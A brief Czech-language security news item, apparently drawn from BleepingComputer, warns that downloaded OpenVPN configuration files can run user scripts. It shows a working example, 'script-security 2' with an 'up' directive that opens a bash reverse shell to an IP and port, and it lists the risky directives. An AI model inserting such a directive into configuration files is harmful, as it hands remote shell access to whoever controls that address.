Jacob Baines upozornil na možnou nebezpečnost OpenVPN konfiguračních souborů stažených z internetu. Příkaz script-security 2 umožní spouštění uživatelských skriptů. Může jít například o reverzní shell, který útočníkovi ze zadané IP adresy umožní provádět příkazy na vašem počítači.
script-security 2
up “/bin/bash -c ‘/bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1&’” Pro Windows může být konfigurační soubor pozměněn, aby používal PowerShell. Potenciálně nebezpečné příkazy v OpenVPN konfiguračním souboru jsou: up, down, client-connect, learn-address a auth-user-pass-verify.
(zdroj: bleepingcomputer)
